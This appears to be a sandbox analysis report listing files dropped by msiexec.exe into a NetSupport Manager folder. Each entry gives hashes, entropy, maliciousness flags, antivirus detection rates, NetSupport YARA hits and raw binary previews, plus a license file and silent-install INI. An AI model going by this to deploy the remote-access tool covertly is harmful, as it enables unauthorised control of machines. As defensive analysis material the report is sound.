                                                                                      Preview:GIF89al.U.....P.....O..S..............X..T...._.................V................................Q..U...........N..........V..M..P.~............W............W..R.......>p.........Y.......]..`..............|....Br.c.....=o.X...........g.....}....m.....Hu.S}....Cs....R|..R....@q....y...O.\..k..;n.r..x..z..Ft.Z...Q.Ny.h...X....a.....t...N.o..i..Oz..U....V~.e........8l.p..u.....Et.d...Y..K....l......L.9m.Kw..R.......Lx.Q{.U}..S.....T.q..4k.v..2j..Y....._.....J.1i........[..I./h....Iv.....J.&d.$d.....\..H.6l..]..a..L..^..H..I..b.-g..]..Z..G.......)e..G.....D.......+f..F..E..B."c..F..E.....K..B..C..F..D..C..`......................................................................................................................!.......,....l.U........H.`6..JY...L.."...VP`...Dd.p...l =V.I...(?RDh..<.......A.fE......Ej..4d.H...Y.U.VD..!.H.*..`..FM..\j..$..Ch.${$T..pO........hpI.%K..I...KcG.......B.....<..)@..?r.Lg+T..X.....@.@....^..

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\keyboard2.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):4283
                                                                                      Entropy (8bit):7.821192064882651
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:WpJqWEsMxTm3h0CXoxYCPLMh3ACSf8IMCldhzGs:WpJyT8mAsdzG3Apf1MCvV
                                                                                      MD5:EC30AA4154A544FC9426051D0B91F90B
                                                                                      SHA1:0CCE9BBBCC46D51040B2102561FF9E59FC8390E9
                                                                                      SHA-256:1D2C086DBB986B6D7246864EBD9F8D265E7ABA98F79AE6E52A53C86F46EFC85F
                                                                                      SHA-512:4170304640A652F55C58787C4AAF0A18D6EC7C782A419EF0C0A11F2958FE950B3707D454FF92E0AEF85E7E279DAB5319E26285BA5D8D372FA400C83C7691398F
                                                                                      Malicious:false
                                                                                      Preview:GIF89a..........xyz888"..................................................#..#..$..%..'..(..*..*..,..-..-.....0..2..4..4..5..6..7..8..9..:..=..=..>..>..?..@..@..D..D..E..G..H..H..J..L..M..L..L..O..O..P..Q..S..T..U..V..X..Z..[..].._.._..b..b..d..f..f..g..h..j..i..i..m..n..o..q..p..s..t..v..w..w..z..|..~...............................................................................................................1..2..4..6..<..B..F..K..M..U..c..b..h..h..k..o..r..q..u..t..~.....................................................................................................................................................................................................................................................................!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s...3%.].p..I...]bxX.0...-..J.*s...X....kJ\@.:5... .......p.^.........P...l)..K.pAeg2.c.qa=!.ZqLY..vU(...l1Lv-..L.......^-...,.

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\network2.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):2951
                                                                                      Entropy (8bit):7.881907377142764
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:j6pdPL2M8R95nbi6j7BCqR7eUP0Pg9DDe1EgOl6UXU7M1SIFI11sSaA4Ve:judT2Rs6j7hyUPNeK56UrjA40
                                                                                      MD5:DD3B10ADD893198C9159F2A4D0E7C534
                                                                                      SHA1:A3E1B3092E8BD0C89BF237D15104A2348C7AAC3C
                                                                                      SHA-256:588B76D2B41138AB4BC6EA53F6D7742A771488346F2AF1A854836524816F1126
                                                                                      SHA-512:B610D3290982FC6ADEF21A4053DA7C09EFAB2337BB8B68856DB58293AD509BCE89B93CFD2229CE9BCD6FFC0D4B14B0FCFBF9AD989583A2CC4AE02558D1250E3F
                                                                                      Malicious:false
                                                                                      Preview:GIF89a.......q.6p.7.......0888......!.......,...........h...0.I..8...`(.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z..v..z..xL....z.n...|N.....~...........................g........................................................................................................8P.5O..*\..C..>9.H..E..+H......2R......EN .....TJ`.....dF....O.:!..I..CO..*].0.L.J.....X......X.2....R...]........K...x...k...~........s..E...<....cL.2e.-...@.f..:..`.y.S..0..uY.;:d.....}X6o.......r...V.\8l..3.;...'......5V...|b....W..|..P./.=u...=KoG.......(......a....w....{r5.Y_...&.=(..j.aa.J........%6.`..$....h"...X.. .. ...(.........(......6...:..%.AZ8d|/>..9...I..b.`.H....X..\r)%..1......;..f&j.Wf.2..]j...:yf.-^.I........8g...H).a.)...d...n..)...)g.........*?..J.F.*.J..*...i.......k.....z....V....&.k...i..*j..TR........B;..V.....i....."+..r.o..Z...B.....m.......".....p..R....OI.. +i...b..."/.\......#....,.........N...Kr.:k\r.2..}4.d.;."...

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\printer2.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):2035
                                                                                      Entropy (8bit):7.88230344011226
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:FSo5FF/7f5vb7vgIsYIeUqVnV5sJDZaQnn9t5o7q8qr/W:8o5FNflb7gIPUqz5sJLn9t5V8qzW
                                                                                      MD5:9B1957B4A51144937F248740C26D24B8
                                                                                      SHA1:B06D1590071110A36E6A94B516E46818F73A797D
                                                                                      SHA-256:E2B717CA84391B8D2158E8029F1C24920180CC9FFB88616520B0E05CE521E528
                                                                                      SHA-512:A048AE98A57870AB67FC954F4E49DBA2534573DB3362BF2C28006FBA40B92526769DFC086BBBD1427BBAF1EB4629D19B5ECA2D87A088E8BCEE19DC8E1931B600
                                                                                      Malicious:false
                                                                                      Preview:GIF89a.............xyy888.d..c.......!.......,...........x...0.I..8...`(.di.h..l.p,.tm.x..|....pH,..H.`.l:..tJ.Z..l4y.z..x.....z}5...\......>...p|2...a.1...U.0Q................[............,.........*........(......&......$....P.)......!................................]...`...+.4.....6...b....V....c..96..._H..H..w....+.D.3f.."k.......zZ....P.D.6;.0.Rr.\jp...S.T..../..]\.y.J+l..d.E...mZXf.}.*.tO..7o............9.F.8...)4v.i1..-Y..9.C.%t.,is........jG.=.F.;.lA.).....:...v.|.p3....<..$..>G....#..^7....".~'.^..!...... ........................4....t.....`..~. ..f4a.P...hB... .(.$.h.(...,...0.X".2.h.8..<.Hc.@.).D.I..F&..L..d.PF).(>I.Xf...Zv..8Z..d........l...p.).t.i.x..|.I"...)..j.".'.#&..F*.Z@.f..VZ....*...).....bz....*.........yk...*...A..&.,..#....Bj...Fk.xN.@..v..6...v...............i....k......,(...Z#..'.'.........,."f{p....p.._...mn...2"...".Hr.&..q.....$..2.0..1...h.......#..3./Oli.~2...H...N.Ym.

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\redbar.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 1 x 20
                                                                                      Category:dropped
                                                                                      Size (bytes):831
                                                                                      Entropy (8bit):0.9654320700764645
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CBI/nExibw5laBr02mxhl/E0ltrllUklE:waERi0Rl/1lGklE
                                                                                      MD5:67B2128FB5228203D3CA1E746BF9C15D
                                                                                      SHA1:084C644983B44ABE7527E6B38390C0000C3F11CC
                                                                                      SHA-256:BE1B29D4F7699CD988FA1E6AB5255735BC4A53C02CD64ACF1BE345EE4EA5F800
                                                                                      SHA-512:137271AF0E21605E5F59F0786F0B22456EB660B2D8425364B2F036693546D56941CDF958B50DEAB04798C36AA27FBBF41ECBC6828CD5A796AF0605F23C457F4B
                                                                                      Malicious:false
                                                                                      Preview:GIF89a........>6.>6.>>.G>.G>.G>.G>.G>........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,...............H.`...;

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\unknown.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 16 x 16
                                                                                      Category:dropped
                                                                                      Size (bytes):952
                                                                                      Entropy (8bit):3.3227002761893862
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:PacUfx/L7/elDHgVHhV9In1gFyEDZjJO73T9+K2ki:vw2lD8HX9In6y+Pa3R+97
                                                                                      MD5:0D0A3F569BE68B6046C02F739DDDAD52
                                                                                      SHA1:9C7A14C4DD671B4BDFC9EEFFE8478EF1A3E0C3BA
                                                                                      SHA-256:F4929A6F524DC3BD502C263C08E4F3DF238BE21512759E7C85B3C31A44C49CA8
                                                                                      SHA-512:CF45F36444BBE731674B19B5090008C3AAE968037CB516989455C1576FBA54AF5CCCED42CB28251383401CD55822A42EBF8A8A71DE3E6B9B8576501AA4A37286
                                                                                      Malicious:true
                                                                                      Preview:GIF89a........m.0n.2p.4q.7s.8s.>x.@z.E}.H..L..Q..T..V..Z..^.._..b..f..m..r..y..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,...............xa....2.\........P.0B..&........HX|.A`...b.0aB...q|."F.."b|....D...<....O....e.."...k....gD. .B......;...Q@..^.vu....".P.....d..e......80...;

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\verified.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 32 x 32
                                                                                      Category:dropped
                                                                                      Size (bytes):958
                                                                                      Entropy (8bit):3.837476529387128
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:3/ZIjXg3LZKOU5pImNVVN6UxKF8uT00NLkE:32jgMx5Kmrr6Ux1izL/
                                                                                      MD5:715C4A7A4ECB3C17856F3486067583B3
                                                                                      SHA1:860F26ED5F34D290EECFF0CFA7AD8DD8A0FE8318
                                                                                      SHA-256:E0DED6BD0DFA994E59786BC83CB62493F511B07F93CDE4305E88A3B1A8986862
                                                                                      SHA-512:ECD7A73F48F36F1F273DCF07DD1B294C43DAE974BD5BCFED60C8761CC1802176E3D4C00395454C824262E580E343C12C9866EBE4E0ED4DA6DF264B3817FBEC47
                                                                                      Malicious:false
                                                                                      Preview:GIF89a . .......................{.z.y.x.(.[(.\'.[..S..S".W'.[(.[).\).\w.y....................!.......,.... . ...q`'.di.h..l.p,..l5.4Vn.....h,.D#rT<.;.'......@rae...#.*<..-.e...D..9.....l/..3|$...4..."..H....O...R..R......!.;.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,...............(.....&.\.O.........A........b...*....c....Q.....(-....f..#F@....C...|<.sD..........;..X..A..E.~d`..PY....$..K.>L...K.;A~.00......YS.Y..-,(P......;

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\video2.gif

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):1163
                                                                                      Entropy (8bit):7.788256448215719
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Gek36A873hchk6lo7Cl1sx6LJXLs9eIavsAD3v3KF8lqeKmX:tkqA8DhUloS3VjIaz3v3oR2
                                                                                      MD5:1DE02006ADA71EEEEF52BDE607411092
                                                                                      SHA1:26224EAD28E087B0CB5AAD3A5CD584598407BA14
                                                                                      SHA-256:241E11F78B196CB96B742E901AC4B07014D9BE89C38FC51C26993E00EFA42464
                                                                                      SHA-512:3B37E775D6DE4C615B137D7F7DE75176B7AC9946BCFDF6FDB04D9A8F570D97EF6E564B4990D9390F8FBFFE7677730A0E786EF5CBBBCC2D10749FAF4736F1CACB
                                                                                      Malicious:false
                                                                                      Preview:GIF89a..........888......!.......,...........................H........L..............L*.....J.....j..........N....................(8..`x..........)9IYiy...H......*:J..Y.......p..+;K..[.....y....l;!\l|.....l. =M]m}...........>N....P.........N..o.....?/...0.....E.G0............>|.......]t....$.}l.....O2H.2.L~........0s...n...@...&4..L.&E...T.O.D...eU.W.z..U@.d5..[6m....}....zp.{...kM.M.7..z.....b....v.8...%[vG.....2....cb..C...9...G.,.:6...d.6..%..i...w...W./.;....-.o..9...K.n.1..s...;..../..<z...m..+..Y..j.~........r<1..|..E`....T.... T.>._.VMH...r.a...5.d....1.h.J(.X.,..b^".(..4rd.w..:.....)d_...Y.@n(V.J.D..E)eAL.UeGTf.......W:.fE[...`........I.....Y.....'.v..'....(.G..f.Z........z..g.F>...x...n:$...).N.\..Z......:T...jkk.".j.i..`..NV..k,M..J(l..!....i..b......Z.m..:;n...{....n.......:...z......Z.o..7:....zp....0....0...91...yq..s.q..W...!?9..%.y..)....-.H.32...:4..,6..s...s.Bc...F..H.H/..L?=..PO.3!.Nk..ae...\..

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\IsMetro.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):58336
                                                                                      Entropy (8bit):6.882094538107883
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:0sOCkVP/zMhlawzEDmAnomANKl49r2pe/TeHDHf/ckpvr2pe/DkqHDHf/cklON:0htcW+KlUee/SjHdjee/hjHhK
                                                                                      MD5:E06343CDA474C451258894E1AF0EA7B0
                                                                                      SHA1:9A02F031A278A3245272ECE1004D0BDD1F40F58D
                                                                                      SHA-256:83222B71D197592C717835F9DAEE81266BE6F47B67B0ED5C84CAEF25877E876B
                                                                                      SHA-512:824185904B08A17D8D2F139376F8BD0C622EF9D461881E117809CB14E043BD77E4A730A6C0E8F1A791DFF355214EB7B5D6F89B19E3271017547A63D7BCC9F731
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z....y...y...y..m...y..m...y..c...y...x...y..m...y..m...y..m...y.Rich..y.........................PE..L...H.oe.................F...<...............`....@.................................`g....@..................................y..P........................]...........................................x..@............`...............................text....D.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....rsrc................v..............@..@.reloc...............~..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2419680
                                                                                      Entropy (8bit):4.698078733564096
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:OlRqzaIVAjheUC4PHYsDyl5+xAx8rSI/HhkSkJ2v7rz82ahdMbAK+p8q6JfXHWZO:4c1xUh85oY05Hhlmj9aZ
                                                                                      MD5:15ACD82C7402BC89F61F2A5E2B0C90EB
                                                                                      SHA1:068D37149E372F01EFEBC40B42BFD873AB9BCFF2
                                                                                      SHA-256:2B9673D6AB08AC2204D50A327D838047A6C64ACDAD765B887B3349D70C9CD307
                                                                                      SHA-512:287A0C23C97E1D557268160F40B6CAC533BFCF7515362C608D57D3DB797AF3499DC0276E775661005A2C8A64462579F8510DE9073FD245CC569516D6F15D0CB4
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.H...F......F....}.F.....F.....F.....F.....F......F..G..F......F.....F.....F.Rich.F.........PE..L...N.oe..........................................@...........................%.......%...@.............................................l.............$..]...`$.h^..P...............................p...@............................................text............................... ..`.rdata..............................@..@.data........ ...D..................@....rsrc...l............F..............@..@.reloc......`$.......#.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):232416
                                                                                      Entropy (8bit):6.6458885862654755
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:l60wP+d9JCHANFegxoTRy212Te/giriLeIezEB:l6dE9MH8FegGTU20T8zxzQ
                                                                                      MD5:9B60C6DDFD1C4BC22007578132FDEE99
                                                                                      SHA1:462DE03AC21EBBAAB8C9A325C7DA8F82B50C6B0B
                                                                                      SHA-256:5ECC47AFFF0FC16009B369A9B5BB969F5DD36D47207BF2A6CF433903E74C216B
                                                                                      SHA-512:F106918649B42EEDB4262C0699FAF465296331990691C99BC16990BC66AB2E3FB6CEEB3FAAF978DE4A4329954BF37D9AB79CC368A08CD38035F4750CBF169217
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..<..to..to..to...o..toi..o..toi..o..toi..o7.to...o..to...o..to..uo..to...o..toi..o..toi..o..toRich..to........................PE..L.....oe.................Z..................p....@.......................................@.................................|........0...................]...@...%..pt..............................8...@............p...............................text...JY.......Z.................. ..`.rdata...g...p...h...^..............@..@.data....F..........................@....rsrc........0......................@..@.reloc...K...@...L..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\NSM.LIC

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):253
                                                                                      Entropy (8bit):5.069358624511852
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                      MD5:D2C2217861F5535686409D80A0867F6F
                                                                                      SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                      SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                      SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                      Malicious:false
                                                                                      Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\NSM.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Generic INItialization configuration [Features]
                                                                                      Category:dropped
                                                                                      Size (bytes):6458
                                                                                      Entropy (8bit):4.645519507940197
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                      MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                      SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                      SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                      SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                      Malicious:false
                                                                                      Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):115168
                                                                                      Entropy (8bit):6.225008841780487
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:/oKKGZiiHapQXaPjALcunPsWjcdRCunjVpnAK9LXee/VujHNee/RjH0:wKKQ/KP8+RCuntxe2ujtesjU
                                                                                      MD5:27C16711A2025C061EA30E09F1BF6609
                                                                                      SHA1:308BF98A3E597B83D066B8F149E47C12FC487642
                                                                                      SHA-256:9159A0FFA498F379570478EC09479764FB8B7130E73B3C02F2FE7BD709B9B20C
                                                                                      SHA-512:9152A43977F82EAC69BD953F9B8D2FEB64C7102386736C8847A32A40D9DF82DCB6DBEA3FDE3D44835C6D03628124308CC240A9EB8456CBC44E6760F40A265D10
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=.fS..fS..fS.v....fS.v....fS.v....fS.{..fS.{..fS.{..fS..fR..fS......fS......fS....fS..f..fS....fS.Rich.fS.........PE..L...;.oe.............................,............@.................................!.....@..........................................P..H............d...]...p..(......8...........................0...@............................................text... ........................... ..`.rdata..8_.......`..................@..@.data...4:..........................@....rsrc...H....P......................@..@.reloc..*3...p...4...0..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):32224
                                                                                      Entropy (8bit):7.0841664339711
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:o52mnrr2pe/GJvHDHf/ckIYBpr2pe/G+HDHf/ckC:gPnfee/wjHx1ee/7jHW
                                                                                      MD5:907C8647640B41EB840DD3F8D5C0267E
                                                                                      SHA1:87D374852CEEB5AB41E6D39FD3B407E51B2BE6F7
                                                                                      SHA-256:4EE7811DFDF1ED46BD2D224B81B3FB0F5371FD5A4DB18358F052DA73316D9A99
                                                                                      SHA-512:B7F6CA82C5547CBA9259934DF8AE08BA706E4FB3E8DB10E1EEB44EDF00336C60BC7CD732BE113E11A321A657D30FC9F1B396A28B2342FD96682EA68147D303D6
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%..a..a..a....y.e....}.`....{.`....O.d....N.c..h.v.h..a.......K.l....~.`......`....x.`..Richa..........PE..L.....oe...........!......................... ...............................`............@.........................p#..r....!..P....@............... ...]...P......P ............................... ..@............ ..D............................text...*........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):9087968
                                                                                      Entropy (8bit):5.4923586433480756
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:aZcDBXpzw67GUIZr7h4721VgP6la/o7TdT7ZbMa3kTaSh95Qn1RURG:KWIM7q2SAyqTaShAnAI
                                                                                      MD5:4BFB9DB4940644EAD940B6C3DB7B6C12
                                                                                      SHA1:48DC699DD2ABDD6562BB14B332C031439717A666
                                                                                      SHA-256:ACA860C6121287876582D3FACA1D120B0B92DA220A537220AC4A352828DAEFB3
                                                                                      SHA-512:B9B57B719EFD5E8F47837FA18B4D4C8E952D962281A09F16B4CE494AB38B851DAC305402C1873FCE41B602B79FE17473EF785D5635B3E5967DBD3D7480CA1357
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........]..]..].....Y..2...W..2...Y..2.6.v..T...R..T...\..T...j..]..U..2.2....2.3.z..2...\..2...\..2...\..Rich]..................PE..L...;8_f...........!.....F....k..............`...............................@............@...........................&.....(m&.0.....(.P._..........N...]... ...F...v........................$......$.@............`......D]&......................text....D.......F.................. ..`.rdata...o...`...p...J..............@..@.data.........&.......&.............@....tls.........`(.......'.............@....hhshare.....p(.......'.............@....rsrc...P._...(..._...'.............@..@.reloc....... ... ..................@..B........................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLL

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):164832
                                                                                      Entropy (8bit):6.897162199883277
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:AMAlhDScGgKqqrccIPaldpZOWCFheHzS7whb1cVeEj5eijd:cfDiWqO9o9Keeei
                                                                                      MD5:9324FCA454B0112B4DD12450FD3DAD1C
                                                                                      SHA1:8AE28F336B602FCB3ED8E83272DD27D622C50A65
                                                                                      SHA-256:3C1FA4D5AFC3996517990D3C36CBBD5BE1939007123F5CA288B3B64CEBC1FC7D
                                                                                      SHA-512:03DA719A40D656130B2D849A3AE689B035C2CA75EB8BADC4EDAF27CC7548DDDB3E923D530ECA28E0B8E94A8984B4F977829339573490489BA670DEC36D11F966
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F....d..d..d.m.y..d...d..d...t..d..d.d.m.M.Dd.m.L.!d.m.|..d.m.}..d.m.z..d.Rich.d.........PE..L...x.oe...........!.................s............ ..........................p............@..........................................@..4............&...]...P..........................................@...............`............................text............................... ..`.rdata...b.......d..................@..@.data...H!..........................@....rsrc...4....@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):632288
                                                                                      Entropy (8bit):6.835333969996357
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:mKM5hHCLsEy4GJNo7Tff0eKsrdKvaj3IzWGLqD9AFPOy0EuEIBy14sYMwWiy8BaR:mKwhHCLsEy+EeKsUvUvGLkqD0ab47MVF
                                                                                      MD5:FEE6C10F16BB7A3DC448BF8111386867
                                                                                      SHA1:50864E624F0DB04B22C9D418D55AE2413FBEDF42
                                                                                      SHA-256:488772E8649C350CD950DCF847786293034371208C297E1E151CF17BF384DD2F
                                                                                      SHA-512:557E0FF6CA34353A30B0F77585905648FA0C1C0824367B0EBDDFC9DA5B57CA7952AA23AEED961EF0163A4A87CE8C267C47050614A74BBB66148E82F8094335D4
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
